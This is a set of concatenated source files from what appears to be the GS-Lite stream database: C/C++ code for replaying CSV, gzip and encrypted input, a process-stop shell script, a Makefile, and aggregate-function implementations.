uint64_t bsa_file_start_time = 0;
uint64_t bsa_total_elapsed_time = 0;
static void next_file_bsa() {
int ret;
if (bsa_file_start_time) {
bsa_total_elapsed_time += (get_posix_clock_time()- bsa_file_start_time);
bsa_file_start_time = 0;
}
ifh = stream->getNextFileHandle(FILEWAIT_TIMEOUT / 1000);
if (!ifh) {
return;
}
if (verbose) {
fprintf(stderr,"%s: Opening %s %s\n", dev, ifh->getHandle().c_str(), stream->getPositionHandle().c_str());
}
bsa_file_start_time = get_posix_clock_time();
reader = ifh->openFile();
if (use_gzip) {
init_inflate();
}
}
static void close_file_bsa() {
if (reader) {
reader->close();
delete reader;
}
reader = NULL;
if (ifh) {
ifh->finished();
delete ifh;
}
ifh = NULL;
}
#endif
static gs_retval_t csv_replay_init(gs_sp_t device)
{
gs_csp_t verbosetmp;
gs_csp_t delaytmp;
gs_csp_t gshubtmp;
gs_csp_t tempdel;
gs_csp_t singlefiletmp;
gs_csp_t compressortmp;
gs_csp_t bsatmp;
gs_csp_t encryptedtmp;
gs_csp_t maxfieldtmp;
gs_csp_t pkey_fname;
gs_csp_t pwd_fname;
gs_csp_t stringtmp;
if ((verbosetmp=get_iface_properties(device,(gs_sp_t)"verbose"))!=0) {
if (strncmp(verbosetmp,"TRUE",4)==0) {
verbose=1;
fprintf(stderr,"VERBOSE ENABLED\n");
} else {
fprintf(stderr,"VERBOSE DISABLED\n");
}
}
stringtmp=get_iface_properties(device,(gs_sp_t)"filename");
if(stringtmp){
name = strdup(stringtmp);
}else{
name = NULL;
}
stringtmp=get_iface_properties(device,(gs_sp_t)"directoryname");
if(stringtmp){
dir_name = strdup(stringtmp);
}else{
dir_name = NULL;
}
if (!name && !dir_name) {
print_error((gs_sp_t)"csv_replay_init::Either \"Filename\" or \"Dirname\" must be defined");
exit(0);
}
tempdel=get_iface_properties(device,(gs_sp_t)"csvseparator");
if (tempdel != 0 ) {
csvdel = tempdel[0];
csv_set_delim(csvdel);
}
if ((singlefiletmp=get_iface_properties(device,(gs_sp_t)"singlefile"))!=0) {
if (strncmp(singlefiletmp,"TRUE",4)==0) {
singlefile=1;
if (verbose)
fprintf(stderr,"SINGLEFILE ENABLED\n");
} else {
if (verbose)
fprintf(stderr,"SINGLEFILE DISABLED\n");
}
}
if ((compressortmp=get_iface_properties(device,(gs_sp_t)"compressor"))!=0) {
if (strncmp(compressortmp,"GZIP",4)==0) {
use_gzip=1;
if (verbose)
fprintf(stderr,"USING ZLIP COMPRESSOR ENABLED\n");
} else {
print_error((gs_sp_t)"csv_replay_init::Unknown value for interface property \"Compressor\"");
exit(0);
}
}
if ((bsatmp=get_iface_properties(device,(gs_sp_t)"bsa"))!=0) {
if (strncmp(bsatmp,"TRUE",4)==0) {
#ifndef BSA_ENABLED
print_error((gs_sp_t)"csv_replay_init::runtime not built with BSA support to use BSA interfaces");
exit(0);
#endif
use_bsa=1;
if (verbose)
fprintf(stderr,"USING BSA STREAMS\n");
}
}
if ((delaytmp=get_iface_properties(device,(gs_sp_t)"startupdelay"))!=0) {
if (verbose) {
fprintf(stderr,"Startup delay of %u seconds\n",atoi(delaytmp));
}
startupdelay=atoi(delaytmp);
}
if ((maxfieldtmp=get_iface_properties(device,(gs_sp_t)"_max_csv_pos"))!=0) {
max_field_csv=atoi(maxfieldtmp);
}
if ((gshubtmp=get_iface_properties(device,(gs_sp_t)"gshub"))!=0) {
if (verbose) {
fprintf(stderr,"CSV format using gshub\n");
}
gshub=1;
if (!name) {
print_error((gs_sp_t)"csv_replay_init::Filename must be defined for gshub interfaces");
exit(0);
}
}
pkey_fname=get_iface_properties(device,(gs_sp_t)"privatekey");
pwd_fname=get_iface_properties(device,(gs_sp_t)"password");
if ((encryptedtmp=get_iface_properties(device,(gs_sp_t)"encrypted"))!=0) {
if (strncmp(encryptedtmp,"TRUE",4)==0) {
#ifndef SSL_ENABLED
print_error((gs_sp_t)"csv_replay_init::runtime not built with SSL support to use encrypted interfaces");
exit(0);
#else
use_decryption=1;
if (verbose) {
fprintf(stderr,"CSV file is encrypted\n");
}
if (!pkey_fname || !pwd_fname) {
print_error((gs_sp_t)"csv_replay_init::privatekey and/or password filenames not specified for encrypted itnerface");
exit(0);
}
OpenSSL_add_all_algorithms();
ERR_load_crypto_strings();
// Read password file
FILE* in_fd = fopen(pwd_fname, "r");
if (!in_fd) {
fprintf(stderr, "Unable to open password file %s\n", pwd_fname);
exit(0);
}
if (!fgets(pwd, CSVMAXLINE, in_fd)) {
fprintf(stderr, "Error reading password from file %s\n", pwd_fname);
exit(0);
}
strtok(pwd, "\r\n\t ");
fclose(in_fd);
// Read the private key
in_fd = fopen(pkey_fname, "r");
if (!in_fd) {
fprintf(stderr, "Unable to open private key file %s\n", pkey_fname);
exit(0);
}
rkey = PEM_read_PrivateKey(in_fd, NULL, pass_cb, NULL);
if (!rkey) {
fprintf(stderr, "Unable to read private key file %s\n", pkey_fname);
exit(-1);
}
fclose(in_fd);
#endif
}
}
cur_packet.ptype=PTYPE_CSV;
return 0;
}
static inline int consume_chunk(gs_sp_t chunk, gs_uint32_t chunk_size) {
int tuple_consumed = 0;
gs_sp_t linepos = chunk;
gs_sp_t new_linepos = (gs_sp_t)memchr(linepos + leftover, '\n', chunk_size);
gs_sp_t end_pos = chunk + chunk_size + leftover;
leftover = chunk_size;
while (new_linepos) {
// *new_linepos = 0; // terminate the line
csv_parse_line(linepos, new_linepos - linepos);
rts_fta_process_packet(&cur_packet);
tuple_consumed++;
linepos = new_linepos + 1;
leftover = end_pos - linepos;
new_linepos = (gs_sp_t)memchr(linepos, '\n', leftover);
}
memcpy(chunk, linepos, leftover);
return tuple_consumed;
}
static int csv_process_chunk(gs_uint32_t chunk_size)
{
gs_int32_t ret;
gs_uint32_t have = chunk_size;
gs_uint32_t tuple_consumed = 0;
if (use_gzip) {
strm.avail_in = have;
strm.next_in = in;
/* run inflate() on input until output buffer not full */
do {
strm.avail_out = CHUNK;
strm.next_out = out + leftover;
ret = inflate(&strm, Z_NO_FLUSH);
/* assert(ret != Z_STREAM_ERROR); state not clobbered */
switch (ret) {
case Z_NEED_DICT:
ret = Z_DATA_ERROR; /* and fall through */
case Z_DATA_ERROR:
case Z_MEM_ERROR:
(void)inflateEnd(&strm);
#ifdef BSA_ENABLED
close_file_bsa();
#endif
fprintf(stderr,"Error inflating data chunk\n");
return 0;
}
have = CHUNK - strm.avail_out;
tuple_consumed += consume_chunk((gs_sp_t)out, have);
} while (strm.avail_out == 0);
/* done when inflate() says it's done */
if (ret == Z_STREAM_END) {
inflateEnd(&strm);
#ifdef BSA_ENABLED
close_file_bsa();
#endif
}
} else {
tuple_consumed += consume_chunk((gs_sp_t)out, have);
}
return tuple_consumed;
}
static gs_int32_t csv_read_chunk() {
gs_int32_t have;
if (gshub!=0) {
return read_chunk_socket((gs_sp_t)out, CHUNK);
} else {
gs_sp_t read_pos = (gs_sp_t)(use_gzip ? in : (out + leftover));
#ifdef BSA_ENABLED
if (use_bsa) {
if (ifh == 0) next_file_bsa();
if (ifh == 0) // if no new files available return
return -1; // -1 indicates a timeout
while ((have = reader->read(read_pos, CHUNK)) == 0) {
close_file_bsa();
next_file_bsa();
if (ifh == 0) { // if no new files available return
return -1; // -1 indicates a timeout
}
}
} else {
#endif
if (fd <= 0) next_file();
#ifdef SSL_ENABLED
if (use_decryption) {
while ((have = BIO_read (mem_io, read_pos, CHUNK)) == 0) {
if (singlefile==1) {
if(verbose) {
fprintf(stderr,"SINGLEFILE PROCESSING DONE! RTS SAYS BYE\n");
}
return -2;
} else {
next_file();
}
}
} else {
#endif
while ((have = read(fd, read_pos, CHUNK)) == 0) {
if (singlefile==1) {
if(verbose) {
fprintf(stderr,"SINGLEFILE PROCESSING DONE! RTS SAYS BYE\n");
}
return -2;
} else {
next_file();
}
}
#ifdef SSL_ENABLED
}
#endif
#ifdef BSA_ENABLED
}
#endif
}
return have;
}
static gs_retval_t csv_process_input()
{
unsigned cnt = 0;
static unsigned totalcnt = 0;
gs_int32_t retval;
while(cnt < 50000) { // process up to 50000 tuples at a time
retval = csv_read_chunk();
if (retval == -1) return 0; // got a timeout so service message queue
if (retval == -2) {
// we signal that everything is done
if (verbose)
fprintf(stderr,"Done processing, waiting for things to shut down\n");
rts_fta_done();
// now just service message queue until we get killed or loose connectivity
while (true) {
fta_start_service(0); // service all waiting messages
usleep(1000); // sleep a millisecond
}
}
cnt += csv_process_chunk((gs_uint32_t)retval);
}
totalcnt = totalcnt + cnt;
if (verbose) {
#ifdef BSA_ENABLED
fprintf(stderr,"%s: Processed %u tuples, rate = %lf tup/sec\n", dev, totalcnt, 1000.0 * (double)totalcnt / (double)bsa_total_elapsed_time);
#else
fprintf(stderr,"Processed %u tuples, rate = %lf tup/sec\n", totalcnt, (double)totalcnt / (double)(time(NULL) - st_time));
#endif
}
return 0;
}
extern "C" gs_retval_t main_csv(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
gs_uint32_t cont;
endpoint mygshub;
dev = device;
csv_replay_init(device);
/* initalize host_lib */
if (verbose) {
fprintf(stderr,"Init LFTAs for %s\n",device);
}
if (hostlib_init(LFTA,0,devicenum,mapcnt,map) < 0) {
fprintf(stderr,"%s::error:could not initiate host lib for clearinghouse\n",
device);
exit(7);
}
fta_init(device); /*xxx probably should get error code back put Ted doesn't give me one*/
// set maximum field nubmer to be extracted by csv parser
csv_set_maxfield(max_field_csv);
cont = startupdelay + time(0);
if (verbose) { fprintf(stderr,"Start startup delay"); }
while (cont > time(NULL)) {
if (fta_start_service(0) < 0) {
fprintf(stderr,"%s::error:in processing the msg queue\n", device);
exit(9);
}
usleep(1000); /* sleep for one millisecond */
}
if (verbose) { fprintf(stderr,"... Done\n"); }
// open the connection to the data source
if (gshub != 0) { init_socket();}
// wait to process till we get the signal from GSHUB
if (get_hub(&mygshub) != 0) {
print_error((gs_sp_t)"ERROR:could not find gshub for data source");
exit(0);
}
while(get_startprocessing(mygshub,get_instance_name(),0) != 0) {
usleep(100);
if (fta_start_service(0) < 0) {
fprintf(stderr,"%s::error:in processing the msg queue\n", device);
exit(9);
}
}
/* now we enter an endless loop to process data */
if (verbose) {
fprintf(stderr,"Start processing %s\n",device);
}
#ifdef BSA_ENABLED
if (use_bsa) {
stream = BSA::FileStream::ISubStream::construct(std::string(name));
stream->init ();
}
#endif
st_time = time(NULL);
while (true) {
if (csv_process_input() < 0) {
fprintf(stderr,"%s::error:in processing records\n", device);
exit(8);
}
/* process all messages on the message queue*/
if (fta_start_service(0) < 0) {
fprintf(stderr,"%s::error:in processing the msg queue\n", device);
exit(9);
}
}
return 0;
}
<file_sep>#!/bin/sh
./stopit
killall gsprintconsole
killall gen_feed.py
killall -9 gsprintconsole
killall -9 gen_feed.py
<file_sep># ------------------------------------------------
# Copyright 2014 AT&T Intellectual Property
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------
CC=gcc -g -O3 -msse4.2 -fexpensive-optimizations -I libdag/include -I ../../../../include/lfta/ -I ../../../../include/ -I .././include/ -I ../../gscphost/include -I ../../../../include/lfta/local -I /usr/local/include
CXX=g++ -g -O3 -msse4.2 -fexpensive-optimizations -I libdag/include -I ../../../../include/lfta/ -I ../../../../include/ -I .././include/ -I ../../gscphost/include -I ../../../../include/lfta/local
SOURCE_C = rts_proto.c
SOURCE_CC =
SOURCE = $(SOURCE_C) $(SOURCE_CC)
OBJECTS = $(SOURCE_C:.c=.o) $(SOURCE_CC:.cc=.o)
all: rts_proto.o
LFTA_DIR=$(INCDIR/lfta)
clean:
rm -f *.o *.a core
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include "gsconfig.h"
#include "gstypes.h"
#include "hfta_udaf.h"
#include "rts_udaf.h"
#include <stdio.h>
#include <limits.h>
#include <math.h>
//#include <memory.h>
#include <string.h>
#include <sys/time.h>
#include <iostream>
#include "hfta_runtime_library.h"
#include"stringhash.h"
#define max(a,b) ((a) > (b) ? (a) : (b))
#define min(x,y) ((x) < (y) ? (x) : (y))
#define lg(x) (log(x) / log(2))
using namespace std;
// -------------------------------------------------------------------
// moving sum over N intervals
struct moving_sum_udaf_str{
gs_uint32_t N;
gs_uint32_t pos;
gs_uint32_t *sums;
};
void moving_sum_udaf_HFTA_AGGR_INIT_(gs_sp_t buf){
struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
u->N=0; u->pos=0; u->sums=NULL;
}
void moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s, gs_uint32_t N) {
struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
if(u->sums == NULL){
u->sums = (gs_uint32_t *)malloc(N*sizeof(gs_uint32_t));
for(gs_int32_t i=0;i<N;i++)
u->sums[i] = 0;
u->N = N;
}
u->sums[u->pos] += s;
}
void super_moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint64_t sub_sum) {
struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
gs_uint32_t s = (gs_uint32_t)(sub_sum & 0xffffffff);
if(u->sums == NULL){
gs_uint32_t N = (gs_uint32_t)((sub_sum & 0xffffffff00000000ull) >> 32);
u->sums = (gs_uint32_t *)malloc(N*sizeof(gs_uint32_t));
for(gs_int32_t i=0;i<N;i++)
u->sums[i] = 0;
u->N = N;
}
u->sums[u->pos] += s;
}
void moving_sum_udaf_HFTA_AGGR_OUTPUT_(gs_p_t *result, gs_sp_t buf){
*result = (gs_p_t)(buf);
}
void moving_sum_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf){
struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
if(u->sums != NULL)
free(u->sums);
}
void moving_sum_udaf_HFTA_AGGR_REINIT_( gs_sp_t buf){
struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) buf;
u->pos++;
if(u->pos >= u->N)
u->pos = 0;
u->sums[u->pos] = 0;
}
gs_uint32_t moving_sum_extract(gs_p_t result){
struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) result;
gs_uint32_t s=0, i=0;
for(i=0; i<u->N;i++){
s += u->sums[i];
}
return s;
}
gs_float_t moving_sum_extract_exp(gs_p_t result, gs_float_t alpha){
struct moving_sum_udaf_str * u = (struct moving_sum_udaf_str *) result;
gs_uint32_t p=0, i=0;
gs_float_t s=0.0, m=1.0;
p=u->pos;
for(i=0; i<u->N;i++){
s += u->sums[i]*m;
if(p==0)
p=u->N - 1;
else
p--;
m *= alpha;
}
return s;
}
// -------------------------------------------------------------------
// sum over 3 intervals : test rUDAF
struct sum3_udaf_str{
gs_uint32_t s_2;
gs_uint32_t s_1;
gs_uint32_t s_0;
};
void sum3_HFTA_AGGR_INIT_(gs_sp_t buf) {
struct sum3_udaf_str * u = (struct sum3_udaf_str *) buf;
u->s_0 = 0; u->s_1 = 0; u->s_2 = 0;
return;
}
void sum3_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s) {
struct sum3_udaf_str * u = (struct sum3_udaf_str *) buf;
u->s_0 += s;
return;
}
void sum3_HFTA_AGGR_OUTPUT_(gs_uint32_t *result, gs_sp_t buf) {
struct sum3_udaf_str * u = (struct sum3_udaf_str *) buf;
*result = u->s_0 + u->s_1 + u->s_2;
return;
}
void sum3_HFTA_AGGR_DESTROY_(gs_sp_t buf) {
return;
}
void sum3_HFTA_AGGR_REINIT_( gs_sp_t buf) {
struct sum3_udaf_str * u = (struct sum3_udaf_str *) buf;
u->s_2 = u->s_1;
u->s_1 = u->s_0;
u->s_0 = 0;
return;
}
#define HISTORY_LENGTH 1024
/////////////////////////////////////////////////////////////////////////
///// Calculate the average of all positive gs_float_t numbers
struct posavg_struct{
gs_float_t sum;
gs_float_t cnt;
};
void POSAVG_HFTA_AGGR_INIT_(gs_sp_t buf) {
struct posavg_struct * a = (struct posavg_struct *) buf;
a->sum=0;
a->cnt=0;
return;
}
void POSAVG_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_float_t v) {
struct posavg_struct * a = (struct posavg_struct *) buf;
if (v>=0) {
a->sum=a->sum+v;
a->cnt=a->cnt+1;
}
return;
}
void POSAVG_HFTA_AGGR_OUTPUT_(gs_float_t * v, gs_sp_t buf) {
struct posavg_struct * a = (struct posavg_struct *) buf;
if (a->cnt>0) {
*v=(a->sum/a->cnt);
} else {
*v=-1;
}
return;
}
void POSAVG_HFTA_AGGR_DESTROY_(gs_sp_t buf) {
return;
}
/////////////////////////////////////////////////////////////////////////
///// avg_udaf (simple example)
// struct received from subaggregate
struct avg_udaf_lfta_struct_t{
gs_int64_t sum;
gs_uint32_t cnt;
};
// scratchpad struct
struct avg_udaf_hfta_struct_t{
gs_int64_t sum;
gs_uint32_t cnt;
};
// avg_udaf functions
void avg_udaf_HFTA_AGGR_INIT_(gs_sp_t b){
avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
s->sum = 0;
s->cnt = 0;
}
void avg_udaf_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v){
avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
s->sum += v;
s->cnt ++;
}
void avg_udaf_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b){
r->length = 12;
r->offset = (gs_p_t)(b);
r->reserved = SHALLOW_COPY;
}
void avg_udaf_HFTA_AGGR_DESTROY_(gs_sp_t b){
return;
}
// avg_udaf superaggregate functions
void avg_udaf_hfta_HFTA_AGGR_INIT_(gs_sp_t b){
avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
s->sum = 0;
s->cnt = 0;
}
void avg_udaf_hfta_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v){
if(v->length != 12) return;
avg_udaf_hfta_struct_t *s = (avg_udaf_hfta_struct_t *) b;
avg_udaf_lfta_struct_t *vs = (avg_udaf_lfta_struct_t *)(v->offset);
s->sum += vs->sum;
s->cnt += vs->cnt;
}
void avg_udaf_hfta_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b){
r->length = 12;
r->offset = (gs_p_t)(b);
r->reserved = SHALLOW_COPY;
}
void avg_udaf_hfta_HFTA_AGGR_DESTROY_(gs_sp_t b){
return;
}
// Extraction function
gs_float_t extr_avg_fcn(vstring *v){
if(v->length != 12) return 0;
avg_udaf_hfta_struct_t *vs = (avg_udaf_hfta_struct_t *)(v->offset);
gs_float_t r = (gs_float_t)(vs->sum) / vs->cnt;
return r;
}
/////////////////////////////////////////////////////////
// FIRST aggregate
// hfta only
// uint
void FIRST_HFTA_AGGR_INIT_(gs_uint32_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
// int
void FIRST_HFTA_AGGR_INIT_(gs_int32_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
// ullong
void FIRST_HFTA_AGGR_INIT_(gs_uint64_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
// llong
void FIRST_HFTA_AGGR_INIT_(gs_int64_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
// string
void FIRST_HFTA_AGGR_INIT_(vstring* scratch) {
scratch->offset= 0;
}
void FIRST_HFTA_AGGR_REINIT_(vstring* scratch) { }
void FIRST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
if (!scratch->offset) {
scratch->length = val->length;
scratch->offset = val->offset;
scratch->reserved = SHALLOW_COPY;
}
}
void FIRST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
*res = *scratch;
}
void FIRST_HFTA_AGGR_DESTROY_(vstring* scratch) { }
// hfta/lfta split
// uint
void FIRST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void FIRST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
*res = *scratch;
}
void FIRST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
// int
void FIRST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void FIRST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
*res = *scratch;
}
void FIRST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
// ullong
void FIRST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void FIRST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
*res = *scratch;
}
void FIRST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
// llong
void FIRST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
}
void FIRST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void FIRST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
}
void FIRST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
*res = *scratch;
}
void FIRST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
// string
void FIRST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch) {
scratch->offset= 0;
}
void FIRST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch) { }
void FIRST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
if (!scratch->offset) {
scratch->length = val->length;
scratch->offset = val->offset;
scratch->reserved = SHALLOW_COPY;
}
}
void FIRST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
*res = *scratch;
}
void FIRST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch) { }
/////////////////////////////////////////////////////////
// LAST aggregate
// hfta only
// uint
void LAST_HFTA_AGGR_INIT_(gs_uint32_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
// int
void LAST_HFTA_AGGR_INIT_(gs_int32_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
// llong
void LAST_HFTA_AGGR_INIT_(gs_int64_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
// ullong
void LAST_HFTA_AGGR_INIT_(gs_uint64_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
// string
void LAST_HFTA_AGGR_INIT_(vstring* scratch) {
scratch->offset= 0;
}
void LAST_HFTA_AGGR_REINIT_(vstring* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
scratch->length = val->length;
scratch->offset = val->offset;
scratch->reserved = SHALLOW_COPY;
}
void LAST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(vstring* scratch) { }
// hfta/lfta split
void LAST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch) { }
void LAST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void LAST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
*scratch = val;
}
void LAST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
*res = *scratch;
}
void LAST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
void LAST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch) { }
void LAST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void LAST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
*scratch = val;
}
void LAST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
*res = *scratch;
}
void LAST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
void LAST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch) { }
void LAST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void LAST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
*scratch = val;
}
void LAST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
*res = *scratch;
}
void LAST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
void LAST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch) { }
void LAST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void LAST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
*scratch = val;
}
void LAST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
*res = *scratch;
}
void LAST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
void LAST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch) {
scratch->offset= 0;
}
